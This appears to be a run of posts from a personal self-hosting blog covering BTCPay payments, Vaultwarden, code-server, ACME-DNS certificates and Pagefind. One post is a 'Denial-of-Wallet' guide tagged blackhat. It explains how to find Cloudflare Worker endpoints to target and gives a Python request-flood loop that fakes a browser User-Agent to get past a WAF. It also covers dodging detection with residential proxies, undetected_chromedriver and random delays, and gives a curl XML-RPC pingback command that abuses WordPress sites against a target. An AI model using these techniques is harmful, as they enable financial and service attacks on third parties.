    btcpay-down.sh
    cd contrib/FastSync
    ./load-utxo-set.sh
    Bash
    # Once FastSync has completed
    cd ../..
    btcpay-up.sh

    After the sync is done you can accept payments, as the screenshot of a Bitcoin payment shows.

    (Please do not send any Bitcoin to this address. They will be lost.)

    Clearing Things Up

    Before we conclude, let’s debunk a common misconception about the “dark web.” It’s not merely a haven for illicit activities. While I used attention-grabbing examples to highlight these tools, it’s essential to recognize their legitimate applications.

    Gone are the days when Tor provided complete anonymity for nefarious actors. As your enterprise expands, tracing your activities becomes increasingly feasible, albeit challenging.

    I emphasize this point to underscore that the services and tools discussed here aren’t inherently unlawful. While they can be exploited for illicit purposes, they also serve valid functions.

    Consider the case of “Shiny Flakes,” who operated a drug trade through a conventional website without relying on Tor, evading detection for a significant duration. You can explore this story further on Netflix: Shiny Flakes: The Teenage Drug Lord. The takeaway is that we shouldn’t demonize technology solely based on its potential for misuse. Encryption, for example, is integral for safeguarding data, despite its association with ransomware.

    Understanding the dual nature of these technologies is crucial for fostering responsible usage and harnessing their benefits while mitigating risks. It’s a delicate balance between innovation and accountability in the ever-evolving landscape of cybersecurity.

    Crafting Your Own Payment Processor

    Creating a custom lightweight solution isn’t as daunting as it sounds. While the previously mentioned platforms offer comprehensive features, you might find yourself needing only a fraction of them. Allow me to introduce you to one of my “Karl Projects” that I never quite finished. One day, while procrastinating on my actual project, I stumbled upon the idea of a super-secret Telegram chat where people would have to pay fees in Bitcoin or Monero. This brainchild was inspired by contemplating the possibilities of utilizing a State Machine.

    Here’s the gist of what you’ll need:

    • State Management: Maintain states such as ORDER_NEW, ORDER_PROCESSING, ORDER_PAID (see the sketch after this list).
    • Dynamic Address Generation: Generate a new address for each transaction (because, let’s face it, that’s what the cool kids do).
    • Transaction Verification: Verify if transactions are confirmed.
    • Payment Request Generation: Create a mechanism for generating payment requests.
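
    To make the state idea concrete, here is a minimal sketch of such a state machine; the names and transitions are illustrative assumptions, not part of my test code below:

    Python
    from enum import Enum, auto
    
    class OrderState(Enum):
        ORDER_NEW = auto()
        ORDER_PROCESSING = auto()
        ORDER_PAID = auto()
    
    def advance(state: OrderState, payment_confirmed: bool) -> OrderState:
        # a fresh order starts processing once a payment request goes out;
        # it only counts as paid after the transaction confirms on-chain
        if state is OrderState.ORDER_NEW:
            return OrderState.ORDER_PROCESSING
        if state is OrderState.ORDER_PROCESSING and payment_confirmed:
            return OrderState.ORDER_PAID
        return state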

    Now, let’s take a peek at my unfinished test code. May it ignite your creativity and spur you on to achieve remarkable feats:

    Python
    import json
    from typing import List
    from bitcoinlib.wallets import Wallet, wallet_create_or_open, WalletKey, BKeyError
    
    # Creating or opening a wallet
    w = wallet_create_or_open(
        "karls_wallet",
        keys="",
        owner="",
        network=None,
        account_id=0,
        purpose=None,
        scheme="bip32",
        sort_keys=True,
        password="",
        witness_type=None,
        encoding=None,
        multisig=None,
        sigs_required=None,
        cosigner_id=None,
        key_path=None,
        db_uri=None,
        db_cache_uri=None,
        db_password=None,
    )
    
    def get_personal_address(wallet: Wallet, name: str = "") -> WalletKey | List[WalletKey]:
        if not name:
            return wallet.keys()
    
        return wallet.key(name)
    
    def create_new_address(wallet: Wallet, name: str = "") -> WalletKey:
        if not name:
            return wallet.get_key()
    
        return wallet.new_key(name)
    
    def check_for_transaction(wallet_key: str | WalletKey, wallet: Wallet):
        if isinstance(wallet_key, str):
            try:
                wallet_key = wallet.key(wallet_key)
            except BKeyError as e:
                print(f'Sorry, no key by the name of "{wallet_key}" in the wallet.')
                return
    
        wallet.scan_key(wallet_key)
        recent_transaction = wallet.transaction_last(wallet_key.address)
    
        if recent_transaction:
            print("Most Recent Transaction:")
            print("Transaction ID:", recent_transaction.txid)
            print("Amount:", recent_transaction.balance_change)
            print("Confirmations:", recent_transaction.confirmations)
        else:
            print("No transactions found for the address.")
    

    Feel free to adapt and expand upon this code to suit your needs. Crafting your payment processor from scratch gives you unparalleled control and customization options, empowering you to tailor it precisely to your requirements. Maybe one day I will put a finished minimalistic payment processor out there.

    Summary

    And with that disappointing note, we conclude for now. But fear not, for knowledge awaits. Here are some additional sources to delve deeper into the world of cybersecurity and anonymity:

    Keep exploring, stay curious, and until next time!

    In case you are from Interpol

    You might be thinking, “Whoa, talking about setting up shop on the dark web sounds sketchy. Should we knock on this guy’s door?” Hey, I get it! But fear not, my friend. Writing about this stuff doesn’t mean I am up to no good. I am just exploring the possibilities, like any curious entrepreneur would. Plus, remember the “Shiny Flakes” story? Bad actors can do bad stuff anywhere, not just on the dark web.

  • Vaultwarden: A Lightweight, Self-Hosted Password Manager

    Vaultwarden: A Lightweight, Self-Hosted Password Manager

    What is Vaultwarden?

    According to their GitHub page:

    An alternative server implementation of the Bitwarden Client API, written in Rust and compatible with official Bitwarden clients [disclaimer], perfect for self-hosted deployment where running the official resource-heavy service might not be ideal.

    If you’re unfamiliar with Vaultwarden or Bitwarden, here’s a quick primer: Vaultwarden is a self-hosted password manager that allows you to securely access your credentials via web browsers, mobile apps, or desktop clients. Unlike traditional cloud-based solutions, Vaultwarden is designed for those of us who value control over our data and want a “syncable” password manager without the resource-heavy overhead.

    Since anything that isn’t self-hosted or self-administered is out of the question for me, Vaultwarden naturally caught my attention. Its lightweight design is perfect for a minimal resource setup. Here’s what I allocated to my Vaultwarden instance:

    Alpine LXC

    1 CPU Core

    1 GB RAM

    5 GB SSD Storage

    And let me tell you, this thing is bored. The occasional uptick in memory usage you might notice is mostly me testing backups or opening 20 simultaneous sessions across devices—so not even Vaultwarden’s fault. To put it simply: you could probably run this on a smart toaster, and it would still perform flawlessly.

    Why I Tried Vaultwarden

    Initially, I came across Vaultwarden while exploring the Proxmox VE Helper Scripts website and thought, “Why not give it a shot?” The setup was quick, and I was immediately impressed by its sleek, modern UI. Since Vaultwarden is compatible with Bitwarden clients, you get the added bonus of using the polished Bitwarden desktop app and its functional, albeit less visually appealing, browser extension.

    My main motivation for trying Vaultwarden was to move away from syncing my KeePass database across Nextcloud and iCloud. This process had become tedious, especially when setting up new development environments or trying out new Linux distributions—something I do frequently.

    Each time, I had to manually copy over my KeePass database, which meant logging into Nextcloud to retrieve it—a task that was ironically dependent on a password stored inside KeePass, which I didn’t have access to yet. With Vaultwarden, I can simply open a browser, enter my master password, and access everything instantly.

    Yes, it’s only one or two steps less than my KeePassXC workflow, but sometimes those minor annoyances add up more than they should. Vaultwarden’s seamless syncing across devices has been a breath of fresh air.

    Is KeePassXC Bad? Not at All! Here’s Why I Still Love It

    Over the years, KeePassXC has been an indispensable tool for managing my passwords and SSH keys. Even as new solutions like Vaultwarden (a self-hosted version of Bitwarden) gain popularity, KeePassXC continues to hold its ground, excelling in several areas where others fall short. Here’s a detailed breakdown of why I still rely on KeePassXC and how it outshines alternatives like Vaultwarden and Bitwarden.

    Why KeePassXC Stands Out (in my opinion)

    1. Superior Password Generator

    KeePassXC’s default password generator is leaps and bounds ahead of the competition. Its design is both powerful and intuitive, offering extensive customization without overwhelming the user. You can effortlessly fine-tune the length, complexity, and character set of generated passwords, making it ideal for advanced use cases.

    2. SSH Agent Integration

    If you work with multiple SSH keys (I manage over 100), KeePassXC’s built-in SSH agent is a game-changer. It allows seamless integration and management of SSH keys alongside your passwords, streamlining workflows for developers and sysadmins alike. This feature alone makes KeePassXC a must-have for me.

    3. File and Hidden Text Storage

    Unlike Bitwarden, which doesn’t currently support file storage, KeePassXC offers advanced options for securely storing files and hidden text.

    Why I’m Running KeePassXC and Vaultwarden in Parallel

    While I’ve started using Vaultwarden for some tasks, there are still key features in KeePassXC that I simply can’t live without:

    Local-Only Security:

    KeePassXC keeps everything offline by default, which eliminates the risks of exposing passwords to the internet. Even though I host Vaultwarden behind a VPN for added peace of mind, there’s something inherently reassuring about KeePassXC’s local-first approach.

    Privacy vs. Accessibility:

    Vaultwarden offers enough security features, like MFA, WebAuthn, or hardware tokens, to safely expose it online, but the idea of having my passwords accessible over the internet still feels unsettling. For that reason, KeePassXC remains my go-to for my most sensitive credentials. I am probably just paranoid; hosting it behind Cloudflare and a firewall with a client certificate would add sufficient security (on top), and you would not have to worry.

    Unique Features:

    There are small yet critical features in KeePassXC, like its file storage capabilities and SSH agent integration, that Vaultwarden simply lacks at the moment.

    What Vaultwarden Does Well

    To give credit where it’s due, Vaultwarden brings some compelling features to the table. One standout is the reporting feature, which alerts you to compromised passwords. It’s a fantastic tool for staying on top of security best practices. I am also a huge fan of web-based tools, and I like the UI and UX in general.

    Conclusion

    Both KeePassXC and Vaultwarden have their strengths, and which one you choose ultimately depends on your priorities. For me, KeePassXC remains the gold standard for password management, offering unparalleled functionality for advanced users. Vaultwarden complements it well for “cloud”-based access and reporting, but it still has a long way to go before it can replace KeePassXC in my workflow.

    For now, running both in parallel strikes the perfect balance between security, usability, and convenience. Since I am running Vaultwarden on my Proxmox, which is already handling all my backup tasks, I also do not have to worry about data loss or doing extra work.

  • Unlock the Power of Remote Development with code-server

    Unlock the Power of Remote Development with code-server

    In the fast-paced world of software development, flexibility and efficiency are paramount. Enter code-server, an innovative tool that allows you to run Visual Studio Code (VS Code) in your browser, bringing a seamless and consistent development environment to any device, anywhere.

    Whether you’re working on a powerful desktop, a modest laptop, or even a tablet (pls don’t!), code-server ensures you have access to your development environment at all times. Here’s an in-depth look at what makes code-server a game-changer.

    What is code-server?

    code-server is an open-source project that enables you to run VS Code on a remote server and access it via your web browser. This means you can:

    • Work on any device with an internet connection.

    • Leverage the power of cloud servers to handle resource-intensive tasks.

    • Maintain a consistent development environment across devices.

    With over 69.2k stars on GitHub, code-server has gained significant traction among developers, teams, and organizations looking for efficient remote development solutions.

    Why would you use code-server?

    1. Flexibility Across Devices

    Imagine coding on your laptop, switching to a tablet, or even a Chromebook, without missing a beat. With code-server, your development environment follows you wherever you go—seamlessly.

    2. Offloading Performance to the Server

    Running resource-intensive tasks on a server instead of your local machine? Yes, please! Whether you’re working on complex builds or handling large datasets, code-server takes the heavy lifting off your device and onto the server.

    3. Bringing Your Dev Environment Closer to LLMs

    With the rise of large language models (LLMs), working near powerful servers hosting these models has become a necessity. No more downloading terabytes of data just to test integrations locally. Code-server simplifies this by placing your environment right where the action is.

    4. Because I Can! 🥳

    As a coder and IT enthusiast, sometimes the best reason is simply: Because I can! Sure, you could run local VSCode with “Remote Development” extensions or install it directly on a Chromebook—but where’s the fun in that? 😉

    5. Streamlined Backup and File Management

    One of my favorite aspects? Developing directly on a remote system where my regular backup processes already take care of everything. No extra steps, no worries—just peace of mind knowing my work is secure.

    I just did it to do it. I use code-server to manage all my Proxmox scripts and develop little sysadmin tools. You also get a nice web shell.

    Installation

    Requirements

    Before diving in, make sure your system meets the minimum requirements:

    Linux machine with WebSockets enabled. (This is important to know when you use a reverse proxy; see the nginx sketch below.)

    • At least 1 GB RAM and 2 vCPUs.

    I think you can get away with 1 vCPU; mine is bored most of the time. Obviously, running resource-intensive code will eat more.

    Check out the full requirements here.
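
    Since WebSockets are the part that trips up most reverse proxy setups, here is a minimal sketch of the relevant nginx directives, assuming code-server listens on 127.0.0.1:8080 (adjust host and port to your setup):

    Nginx
    location / {
      proxy_pass http://127.0.0.1:8080/;
      proxy_set_header Host $host;
      # these two headers upgrade the connection so WebSockets work
      proxy_set_header Upgrade $http_upgrade;
      proxy_set_header Connection upgrade;
    }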

    Installation

    There are multiple ways to get started with code-server, but I chose the easiest one:

    Bash
    curl -fsSL https://code-server.dev/install.sh | sh

    This script ensures code-server is installed correctly and even provides instructions for starting it. Never run a script from the internet like this without checking it first.
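
    On systemd-based distributions, the install script typically registers a templated service; if yours did, starting code-server now and on every boot should be as simple as:

    Bash
    sudo systemctl enable --now code-server@$USER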

    Configuration

    After installation, you can customize code-server for your needs. Explore the setup and configuration guide to tweak settings, enable authentication, and enhance your workflow.

    Bash
    nano ~/.config/code-server/config.yaml

    That is where you will find the password to access code-server, and you can also change the port:

    ~/.config/code-server/config.yaml
    bind-addr: 127.0.0.1:8080
    password: 5f89a538c9c849b439d0f866
    cert: false

    You can disable authentication by setting auth: none in this file (instead of the default auth: password). Personally, I use SSO through Authentik for authentication.

    Now you have an awesome way to code in your browser.

    Resources

    GitHub Repository

    Setup Guide

    Frequently Asked Questions

  • How to Get Real Trusted SSL Certificates with ACME-DNS in Nginx Proxy Manager

    How to Get Real Trusted SSL Certificates with ACME-DNS in Nginx Proxy Manager

    Today, I’m going to show you how you can obtain real, trusted SSL certificates for your home network or even a public website. Using this method, you can achieve secure HTTPS for your web services with certificates that browsers recognize as valid. Fun fact: the very website you’re reading this on uses this same method!

    This guide focuses on using ACME-DNS with Nginx Proxy Manager (NPM), a popular reverse proxy solution with a user-friendly web interface. Whether you’re setting up a self-hosted website, Nextcloud, or any other service, this approach can provide you with certificates signed by a trusted Certificate Authority (CA) for your home network or the public.

    Prerequisites

    • I am assuming you are on a Debian-based Linux distribution (I will use a Debian 12 LXC). This should work on any host supporting Docker, though.
    • You should have some knowledge of Docker and Docker Compose, and they should be installed. You can find a step-by-step guide here.
    • You need your own domain. I get mine from Namecheap, but any provider works. (I usually change the nameservers to Cloudflare and manage my domains there, since Namecheap is cheaper for buying.)

    Please make sure you have these packages installed:

    Bash
    apt install curl jq nano

    (Yup, I like nano. Feel free to use your editor of choice.)

    Installing Nginx Proxy Manager

    Please refer to the installation guide on the Nginx Proxy Manager Website.

    For our installation we will be using Docker with Docker Compose:

    docker-compose.yml
    services:
      npm:
        image: 'jc21/nginx-proxy-manager:latest'
        restart: unless-stopped
        ports:
          - '443:443'
          - '81:81' # Admin Port
          # - '80:80' # not needed in this setup
        volumes:
          - ./data:/data
          - ./letsencrypt:/etc/letsencrypt
          # - ./custom-syslog.conf:/etc/nginx/conf.d/include/custom-syslog.conf

I only like to expose port 443; since we will be using ACME-DNS, we will not need port 80. Port 81 will be exposed for now, but once everything is configured we will remove it too.

Now just run this command and you will be able to log in via http://your-ip:81 (replace “your-ip” with the actual IP of your machine; you can try http://127.0.0.1:81 if running locally):

    Bash
    docker compose up -d

    The default credentials are:

    Bash
    Email:    [email protected]
    Password: changeme

    Optional:

I will also show you my custom syslog config. This is beyond the scope of this post and entirely optional; you do not need it:

    custom-syslog.conf
    log_format proxy_host_logs '$remote_addr - $remote_user [$time_local] '
                               '"$request" $status $body_bytes_sent '
                               '"$http_referer" "$http_user_agent" "$host" '
                               'tag="proxy-host-$host"';
    
    access_log syslog:server=udp://logs.karl:514,tag=proxy-host-$host proxy_host_logs;
    error_log syslog:server=udp://logs.karl:514,tag=proxy-host-$host warn;

    logs.karl is my local DNS record for my rsyslog server. I will make a post about my logging setup and link it here in the future.

    Setting up ACME-DNS

    The official documentation can be found here.

    Simply run this command:

    Bash
    curl -s -X POST https://auth.acme-dns.io/register | jq

    The response should look like this (I used some “X” to anonymize it a little):

    JSON
    {
      "username": "XXXXc1ab-XXXX-XXXX-XXXX-ec893c5ad50e",
      "password": "CkdjW5wqnXXXXXXXXXXXXXXcGZZyznUDkGRuXHdz",
      "fulldomain": "XXXX040a-XXXX-XXXX-XXXX-XXXX f8525a11.auth.acme-dns.io",
      "subdomain": "XXXX040a-XXXX-XXXX-XXXX-XXXX f8525a11",
      "allowfrom": []
    }

Please take note of the output and copy it to a file or note-taking tool for later.

We will need to edit this a little. If you are setting this up for your home network, it is usually a good idea to use a subdomain and a wildcard certificate; this will let you secure anything under that subdomain.

There should be a “data” directory in your current one, created by the docker command earlier. In it, we will create a JSON config file for Nginx Proxy Manager; you can name it whatever you want.

    Bash
    ls # check if "data" dir exists
    cd data
nano acme_your_domain.json # use your domain name, but the name does not matter

    In this file you will need to paste the config. I suggest using a subdomain like “home”.

    JSON
    {
      "home.your-domain.com": {
        "username": "XXXXc1ab-XXXX-XXXX-XXXX-ec893c5ad50e",
        "password": "CkdjW5wqnXXXXXXXXXXXXXXcGZZyznUDkGRuXHdz",
        "fulldomain": "XXXX040a-XXXX-XXXX-XXXX-XXXX f8525a11.auth.acme-dns.io",
        "subdomain": "XXXX040a-XXXX-XXXX-XXXX-XXXX f8525a11",
        "allowfrom": []
      },
      "*.home.your-domain.com": {
        "username": "XXXXc1ab-XXXX-XXXX-XXXX-ec893c5ad50e",
        "password": "CkdjW5wqnXXXXXXXXXXXXXXcGZZyznUDkGRuXHdz",
        "fulldomain": "XXXX040a-XXXX-XXXX-XXXX-XXXX f8525a11.auth.acme-dns.io",
        "subdomain": "XXXX040a-XXXX-XXXX-XXXX-XXXX f8525a11",
        "allowfrom": []
      }
    }
    

It is important to note that with a wildcard like this you cannot do something like “plex.media.home.your-domain.com”; the wildcard only covers the specified level of subdomain. If you wanted a “sub-sub” domain, you would need “*.media.home.your-domain.com”, and so on.

A note on “allowfrom": []”: if you have a static IP that you will always be coming from, restricting it here is a good idea. Since this guide focuses on SSL for your home network, you most likely have a dynamic IP, which would only work until it changes, so probably for 24 hours or a week.
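If you do have a static IP or a stable range, acme-dns lets you pass the restriction at registration time (per the acme-dns documentation; 198.51.100.0/24 is a placeholder range):

Bash
# Register an account that only accepts updates from the given CIDR range
curl -s -X POST https://auth.acme-dns.io/register \
     -H "Content-Type: application/json" \
     --data '{"allowfrom": ["198.51.100.0/24"]}' | jq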

    Configuring DNS Records

You need to add records at your registrar (or wherever your public DNS is managed) and in your local DNS server. I am using Cloudflare.

    Cloudflare

Go to “your Domain -> DNS -> Records”; there you will need to add a CNAME record.

In the “Name” field, put “_acme-challenge.YOUR-SUBDOMAIN”; in our example that would be what you see in the image below. In the “Target” field, put the “fulldomain” from your config, like “XXXX040a-XXXX-XXXX-XXXX-XXXXf8525a11.auth.acme-dns.io“. Leave “Proxy status” on “DNS only”.

(If you are doing a public setup rather than a home-only one, you would also add an A, AAAA, or CNAME record pointing to your public IP. For a home setup, you do not need this.)
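Once the record is live, you can verify it from any machine; the hostname below uses the example subdomain from this guide:

Bash
# Should print the acme-dns "fulldomain" you registered
dig +short _acme-challenge.home.your-domain.com CNAME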

    Local DNS

The devices in your network need to know that your reverse proxy, i.e. Nginx Proxy Manager, is handling “*.home.your-domain.com”, so you need to add this to your local DNS server: whenever someone goes to “*.home.your-domain.com”, it should be directed to your proxy. Whether you do this in a Pi-hole, AdGuard, pfSense, OPNsense, or your router varies; technically you could even edit the hosts file of each device.
I am using a UniFi Dream Machine:

In your Dream Machine go to: /network/default/settings/routing/dns

There you create a new entry like so:

    Please use your configured domain and the IP of your system.
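For reference, on a plain dnsmasq-based resolver (which Pi-hole uses under the hood) the equivalent wildcard entry is a one-liner; 10.0.0.5 is a placeholder for your proxy's IP, and Pi-hole has its own UI for this:

Bash
# dnsmasq syntax: resolve home.your-domain.com and everything under it to the proxy
echo 'address=/home.your-domain.com/10.0.0.5' | sudo tee /etc/dnsmasq.d/99-npm-wildcard.conf
sudo systemctl restart dnsmasq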

    Bringing it all together

All we need to do now is configure our setup in Nginx Proxy Manager. Go to your admin interface at http://your-ip:81/nginx/certificates, then click on “Add SSL-Certificate” and choose “Let’s Encrypt”.

    There is a lot going on here but I will explain:

    • In “Domain Names” enter the domains you have configured
    • Enter your E-Mail Address
    • Choose “ACME-DNS” in the Provider menu
    • In the API URL enter “https://auth.acme-dns.io”
• The registration file is the JSON file we created earlier. Enter whatever you called it; the path “/data/” should be fine if you followed all the steps.
    • Leave propagation empty

    Finally just agree and save.

    Your new certificate will pop up once the loading screen goes away.

    It should look like this:

    By the way, I have a profile image because I used my Gravatar email address for the admin login.

    Securing the Nginx Proxy Manager Admin

Now that we have a certificate, let us use it directly on our admin interface.

Add a new proxy host and enter the domain of your choosing (you need to change “your-domain.com”). Since Nginx Proxy Manager is accessing itself inside the Docker network, the hostname is “npm”, its service name from the “docker-compose.yml” at the beginning.

    Under the “SSL” tab just choose your created certificate.

You do not have to enable Force SSL, HTTP/2, or Block Common Exploits for this to work.

    Okay now press Save and test!
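You can also test from the command line; npm.home.your-domain.com is a placeholder for the domain you just configured:

Bash
# -v prints TLS handshake details to stderr; grep pulls out the cert subject,
# issuer, and the HTTP status line
curl -vI https://npm.home.your-domain.com 2>&1 | grep -E 'subject:|issuer:|HTTP'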

If it works, you can now remove the admin port from the compose file:

    Bash
    docker compose down
    nano docker-compose.yml
    docker-compose.yml
    services:
      npm:
        image: 'jc21/nginx-proxy-manager:latest'
        restart: unless-stopped
        ports:
          - '443:443'
        volumes:
          - ./data:/data
          - ./letsencrypt:/etc/letsencrypt
    Bash
    docker compose up -d --build

    Now you can access your Nginx Proxy Manager admin interface via your new domain with a trusted SSL certificate.

    Conclusion

Using ACME-DNS with Nginx Proxy Manager is a powerful way to obtain SSL certificates for your home network or website. It simplifies the process of handling DNS challenges and automates certificate issuance for secure HTTPS. You will also no longer have to expose your local services to the internet to get new certificates.

    By following this guide, you’ve gained the tools to secure your online services with minimal hassle. Stay tuned for more tips on managing your self-hosted environment, and happy hosting!

  • Denial-of-Wallet Attacks: Exploiting Serverless

    Denial-of-Wallet Attacks: Exploiting Serverless

    Disclaimer:

    The information provided on this blog is for educational purposes only. The use of hacking tools discussed here is at your own risk.

    For the full disclaimer, please click here.

    Introduction

    In the fast-paced world of cyber warfare, attackers are always on the hunt for new ways to hit where it hurts – both in the virtual world and the wallet. The latest trend? Denial-of-Wallet (DoW) attacks, a crafty scheme aimed at draining the bank accounts of unsuspecting victims.

    I am assuming you know what serverless is. Otherwise read this first: What is serverless computing?

    Attack Surface

    Serverless setups, touted for their flexibility and scalability, have become prime targets for these digital bandits. But fear not! Here’s your crash course in safeguarding your virtual vaults from these costly exploits.

    What’s a DoW attack, anyway?

    Think of it as the mischievous cousin of the traditional denial-of-service (DoS) onslaught. While DoS attacks aim to knock services offline, DoW attacks have a more sinister agenda: draining your bank account faster than you can say “cloud computing.”

    Unlike their DDoS counterparts, DoW attacks zero in on serverless systems, where users pay for resources consumed by their applications. This means that a flood of malicious traffic could leave you with a bill so hefty, it’d make Scrooge McDuck blush.

    But wait, there’s more!

    With serverless computing, you’re not just outsourcing servers – you’re also outsourcing security concerns. If your cloud provider drops the ball on protection, you could be facing a whole buffet of cyber threats, not just DoW attacks.

    Detecting & Protecting

    Now, spotting a DoW attack isn’t as easy as checking your bank statement. Sure, a sudden spike in charges might raise eyebrows, but by then, the damage is done. Instead, take proactive measures like setting up billing alerts and imposing limits on resource usage. It’s like putting a lock on your wallet before heading into a crowded marketplace.

    And let’s not forget about securing those precious credentials. If an attacker gains access to your cloud kingdom, they could wreak havoc beyond just draining your funds – we’re talking file deletions, instance terminations, the whole nine yards. So buckle up with least privilege services, multi-factor authentication, and service control policies to fortify your defenses.

    In the arms race between cyber crooks and cloud defenders, staying one step ahead is key. So, arm yourself with knowledge, fortify your defenses, and may your cloud budgets remain forever full!

    How to Attack

This is what you came here for, isn’t it? Before I go on, I would like to remind you of my Disclaimer.

    Cloudflare

    First of all, big shoutout to Cloudflare for actually providing a valuable free tier of services (they do not pay me or anything, I actually like them a lot).

Basically, they provide serverless functions called “Cloudflare Workers”. Their endpoints usually look like this: worker-blah-blah-1337.blah.workers.dev. You can also choose your own custom domain, but the default route stays enabled. I recommend you disable it, or else… well, stay tuned.
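If you deploy your Workers with Wrangler, disabling that default route is a single setting in the project config (my-worker is a placeholder name):

wrangler.toml
name = "my-worker"
# Disable the *.workers.dev route so only your custom domain serves traffic
workers_dev = false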

    Here is their own billing example (Source):

| | Monthly Costs | Formula |
| --- | --- | --- |
| Subscription | $5.00 | |
| Requests | $27.00 | (100,000,000 requests – 10,000,000 included requests) / 1,000,000 × $0.30 |
| CPU time | $13.40 | (7 ms of CPU time per request × 100,000,000 requests – 30,000,000 included CPU ms) / 1,000,000 × $0.02 |
| Total | $45.40 | |

    They actually mention denial-of-wallet attacks and how you can counter them, or at least lessen the impact.

    Finding Cloudflare Workers

One of the easiest ways to find endpoints is GitHub, using a simple query like ?q=workers.dev&type=code or ?q=workers.dev&type=commits. As I am writing this, I found 121,000 lines of code that include workers.dev; subtract the duplicates and you maybe end up with 20,000 endpoints, some of them belonging to pretty big companies.

The next easy find is some Google hacking: site:workers.dev returns 2,230,000 results (some being duplicates).

    Attacking Cloudflare Workers (hypothetically)

A tool like Plow, an HTTP(S) benchmarking tool, can do about 1,000,000 requests per 10 seconds on a normal machine using 20 connections. Playing with the settings you can probably get a lot more, but it depends on factors like bandwidth and internet speed. So in theory, you could cost your target $120 per hour from your home PC or laptop. If you got 3 of your friends involved, you could cost your target almost $500 per hour. Run that script 24/7 and you are costing your target $12,000 a day, or $84,000 a week. If you are attacking an enterprise, that may not even hurt much, but imagine a small company paying 12k every day. As I explained above, there is also no going back: that compute is consumed and will be charged. If they use something like KV and other services, you can multiply these numbers. A pretty common pattern is to have one Worker act as an API gateway, so one request could actually trigger up to 50 or 100 sub-requests.
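For a sense of scale, a hypothetical Plow invocation against a placeholder endpoint could look like this (flags per Plow's README; verify against your version):

Bash
# 20 concurrent connections, run for one hour
plow https://worker-blah-blah-1337.blah.workers.dev -c 20 -d 1h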

    If, by just reading this, you feel bad, then congrats 🎉, you are probably one of the good guys, girls or anything in between.

    Back to reality

Cloudflare being Cloudflare, they obviously have pretty good protections as is; in my experience, better than AWS or Azure. So simply running a tool and hoping for carnage will not get you far.

    Some additional protections Cloudflare provides are:

Being able to do all this easily for free, including their free DDoS protection, should build up a nice barrier against such attacks. Looking at the bigger picture, it is actually crazy that this can all be done for free; on AWS you would have to pay extra for all of these features and essentially denial-of-wallet yourself (😁).

Any protection is only good if it is enabled and configured correctly. For example, I am using the following WAF rule:

    (not http.user_agent contains "Mozilla/5.0")

This basically blocks everything that does not advertise itself as a browser. If you know a tiny bit about how User-Agent headers work, you know that getting around this rule is super simple. You would just need to write a script like this:

Python
import requests

url = 'SOME PROTECTED URL'

# Pretend to be a real Chrome browser so the naive WAF rule lets us through
headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36',
}

# Run ~100 million requests with a one-second timeout; swallow timeouts and
# connection errors so a single failed request does not kill the loop
for _ in range(100_000_000):
    try:
        requests.get(url, timeout=1, headers=headers)
    except requests.RequestException:
        pass

    Now my simple filter rule thinks it is a browser and will let it through.

Check out my 24-hour WAF statistics:

As you can see, most of the bots and scripts are blocked by this stupidly simple rule. I am not showing you the rest of the rules, because I am literally explaining how you could get around my defenses, which is usually not a great idea on a post tagged #blackhat.

    Real world attack

In a real-world attack, you will need residential proxies or multiple IPs with a high reputation. You then write a more advanced tool that automates a browser; otherwise you will be detected very quickly. Even better if you use something like undetected_chromedriver for more success.

Obviously, you also want to add random waits; a script firing every second will light up like a Christmas tree:

Python
from random import randint
from time import sleep

# Wait between 0 and 5 seconds before the next request
sleep(randint(0, 5))

(You could just send as many requests as you want and let your hardware or internet connection add “organic” random waits, but this will ultimately get you blocked for sending too many requests too fast.)

You will need more machines with more residential IPs, as this approach is a lot slower, but you will slowly drain your target’s wallet this way. In the end, you could have this running on something like a Raspberry Pi, costing you next to nothing in electricity, just slowly attacking your target; depending on their setup, each single request from your side could be 50 on theirs.

One other cool trick, which is actually still possible, is to hijack WordPress websites that have xmlrpc.php enabled. This is called an XML-RPC pingback attack and is as simple as:

    Bash
    curl -D - "www.vuln-wordpress.com/xmlrpc.php" \
         -d '<methodCall>
                <methodName>pingback.ping</methodName>
                <params>
                  <param>
                    <value>
                      <string>[TARGET HOST]</string>
                    </value>
                  </param>
                  <param>
                    <value>
                      <string>www.vuln-wordpress.com/postchosen</string>
                    </value>
                  </param>
                </params>
              </methodCall>'

    Summary

As this post is getting long, I decided to end it here. These attacks work on any cloud-based “serverless” provider that bills by usage. The key idea is to hit as many of a company’s “billed by usage” endpoints as possible.

In theory this can do a lot of damage; in practice you will have to do a little more than just send a billion requests, as fast as possible, with some script to an endpoint. I highlighted some ways to get around protections above, but you will most likely have to come up with your own new or custom solution in order to outsmart your target.

Why Cloudflare?

I picked Cloudflare as an example because I use them for everything and really like them. (Again, I am not paid to say this; I actually like them.) This attack works on any other provider as well; in fact, it will probably work the least on Cloudflare, because of their free DDoS protection.

On AWS, the WAF alone would cost as much as the Cloudflare Workers usage, so actually getting through the AWS WAF and then hitting a Lambda function, maybe even one that reads data from S3, would be disastrous.

  • Building a static site search with Pagefind

    Building a static site search with Pagefind

    Introduction

    Hey there, web wizards and code conjurers! Today, I’m here to spill the beans on a magical tool that’ll have you searching through your static site like a pro without sacrificing your users’ data to the digital overlords. Say goodbye to the snooping eyes of Algolia and Google, and say hello to Pagefind – the hero we need in the wild world of web development!

    Pagefind

    So, what’s the deal with Pagefind? Well, it’s like having your own personal search genie, but without the need for complex setups or sacrificing your site’s performance. Here’s a quick rundown of its enchanting features straight from the Pagefind spellbook:

    • Multilingual Magic: Zero-config support for sites that speak many tongues.
    • Filtering Sorcery: A powerful filtering engine for organizing your knowledge bases.
    • Custom Sorting Spells: Tailor your search results with custom sort attributes.
    • Metadata Mysticism: Keep track of custom metadata for your pages.
    • Weighted Wand Wielding: Adjust the importance of content in your search results.
• Section Spellcasting: Fetch results from specific sections of your pages.
    • Domain Diving: Search across multiple domains with ease.
    • Index Anything Incantation: From PDFs to JSON files, if it’s digital, Pagefind can find it!
    • Low-Bandwidth Brilliance: All this magic with minimal bandwidth consumption – now that’s some serious wizardry!

    Summoning Pagefind

Now, let’s talk about summoning this mystical tool onto your Astro-powered site. It’s as easy as waving your wand and chanting npx pagefind --site "dist". Poof! Your site’s now equipped with the power of search!
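(If you want to poke at the generated index locally, the Pagefind CLI can also serve your built site; --serve is part of recent versions, but check pagefind --help on yours:)

Bash
# Build the search index, then serve the static site with search enabled
npx pagefind --site "dist" --serve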

    With a flick of your build script wand, you’ll integrate Pagefind seamlessly into your deployment pipeline. Just like adding a secret ingredient to a potion, modify your package.json build script to include Pagefind’s magic words.

    JSON
      "scripts": {
